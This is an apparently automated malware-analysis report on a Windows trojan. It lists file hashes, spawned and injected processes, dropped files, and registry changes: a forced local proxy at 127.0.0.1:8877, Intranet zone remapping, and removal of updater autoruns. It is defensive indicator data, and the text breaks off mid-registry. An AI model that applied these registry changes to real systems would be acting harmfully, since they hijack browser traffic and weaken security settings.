Trojan.Generic.14779156_000b647a23

by malwarelabrobot on August 23rd, 2015 in Malware Descriptions.

Trojan.Generic.14779156 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 000b647a23034792225a3ab9da073d23
SHA1: fa8475f0d144c280a8bfe66f77fe9be5532ed613
SHA256: 9ba0b90747d5c75e257f34d552b481f70532d837bdb508f4566006691395eb12
SSDeep: 24576:gRpVgU6qc00PhieAdO7gejjdYKmui3zmd:QVgUo00PQlMHdYvM
Size: 816061 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

WMIC.exe:1768
%original file name%.exe:1588
taskkill.exe:1268
taskkill.exe:744
taskkill.exe:572
taskkill.exe:628
taskkill.exe:1200
taskkill.exe:1920
taskkill.exe:1924
taskkill.exe:232
taskkill.exe:1984
taskkill.exe:1776
taskkill.exe:1812
taskkill.exe:1192
taskkill.exe:1584
taskkill.exe:1252
taskkill.exe:1464
taskkill.exe:2016
taskkill.exe:1036
taskkill.exe:2012
taskkill.exe:1096
taskkill.exe:1216
taskkill.exe:672
taskkill.exe:1332
taskkill.exe:120
taskkill.exe:1932
taskkill.exe:228
taskkill.exe:388
taskkill.exe:1020
taskkill.exe:1432
taskkill.exe:1280
taskkill.exe:1728
taskkill.exe:1384
taskkill.exe:860
taskkill.exe:908
taskkill.exe:1240
taskkill.exe:2020
taskkill.exe:1008
taskkill.exe:296
taskkill.exe:292
taskkill.exe:680
taskkill.exe:1416

The Trojan injects its code into the following process(es):

qPAyENSREpdiRdy4l7PC.exe:752
winonit.exe:1304
wincheckfe.exe:1024
wcheckf.exe:1312
vchk.exe:1968
getcap.exe:500
internetport3.exe:1980

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process WMIC.exe:1768 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\FastInternet\TempWmicBatchFile.bat (0 bytes)
C:\a\ProcessList.txt (1418 bytes)

The Trojan deletes the following file(s):

C:\a\ProcessList.txt (0 bytes)

The process qPAyENSREpdiRdy4l7PC.exe:752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\apqPAyENSREpdiRdy4l7PC.html (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\ckkkp[1].htm (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\qPAyENSREpdiRdy4l7PC.html (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\localhost[1].htm (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ckkk[1].htm (303 bytes)
C:\a\1loogg2.txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\System.dll (11 bytes)
C:\a\1logff.txt (717 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\nsC.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aqPAyENSREpdiRdy4l7PC.html (303 bytes)
C:\a\vv11111.txt (22012 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\qPAyENSREpdiRdy4l7PC.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\apqPAyENSREpdiRdy4l7PC.html (0 bytes)
C:\a\ProcessList.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\nsC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aqPAyENSREpdiRdy4l7PC.html (0 bytes)
C:\a\vv11111.txt (0 bytes)

The process winonit.exe:1304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\a\avv.txt (2896 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\System.dll (11 bytes)
C:\a\auur.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\uur[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\vv[1].htm (2896 bytes)

The Trojan deletes the following file(s):

C:\a\ahho.txt (0 bytes)
C:\a\vv.txt (0 bytes)
C:\a\uur.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp (0 bytes)

The process wincheckfe.exe:1024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\System.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsc5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp (0 bytes)

The process wcheckf.exe:1312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\vchk[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp\System.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsn7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (0 bytes)

The process %original file name%.exe:1588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\a\FiddlerCore.dll (9485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\pwgen.dll (17 bytes)
C:\a\zuur.txt (2 bytes)
C:\a\internetport3.exe (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\cki[1].htm (11 bytes)
C:\a\wcheckf.exe (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\uniqueqPAyENSREpdiRdy4l7PC[1].htm (10 bytes)
C:\a\zhho.txt (3 bytes)
C:\a\qPAyENSREpdiRdy4l7PC.exe (3808 bytes)
C:\a\zvchk.txt (3 bytes)
%Program Files%\FastInternet\app.exe (1078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\bdcount[1].htm (8 bytes)
C:\a\winonit.exe (435 bytes)
C:\a\ayyyyy.txt (11 bytes)
%Program Files%\FastInternet\dotuninstall.exe (1084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\qPAyENSREpdiRdy4l7PC[1].exe (3808 bytes)
C:\a\ukey.ini (27 bytes)
%System%\3215049.bat (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
C:\a\zvv.txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\SimpleFC.dll (5289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (20 bytes)
C:\a\ver.ini (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\UAC.dll (13 bytes)
C:\a\getcap.exe (10027 bytes)
C:\a\3cMmvL8egY.exe (5873 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\intr.lnk (527 bytes)
C:\a\73941422.bat (287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\AccessControl.dll (13 bytes)
C:\a\wincheckfe.exe (778 bytes)
C:\a\uniqueqPAyENSREpdiRdy4l7PC.ini (10 bytes)
C:\a\install.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\pwgen.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\SimpleFC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\AccessControl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (0 bytes)

The process vchk.exe:1968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2E.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\vchk[1].htm (1946 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns15.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns17.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns27.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns25.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns19.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns12.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns31.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns34.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns20.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns22.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns33.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns28.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns21.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns16.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns29.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns30.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns39.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns32.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns38.tmp (6 bytes)
C:\a\avchk.txt (1946 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1E.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns13.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns18.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns26.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns23.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns37.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns35.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns24.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns36.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2F.tmp (6 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns34.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3B.tmp (0 bytes)
C:\a\vchk.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns30.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns39.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns38.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns36.tmp (0 bytes)

The process getcap.exe:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\a\7za.exe (15192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsnE.tmp\System.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsnE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsnD.tmp (0 bytes)

The process internetport3.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\a\logff.txt (717 bytes)
C:\a\loogg2.txt (240 bytes)

Registry activity

The process WMIC.exe:1768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 ED 30 5B 30 38 BE 3C 03 F8 A6 59 79 B8 71 2A"

The process qPAyENSREpdiRdy4l7PC.exe:752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Po"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 30 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxySettingsPerUser" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 EE 67 3D 6C EE B8 87 6A BD 2C 7D 82 3A 49 93"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Po"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe ARM"

"SunJavaUpdateSched"

The process winonit.exe:1304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2F 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 FC 06 F6 38 70 EE DA 2D 06 F5 89 54 55 C9 F3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
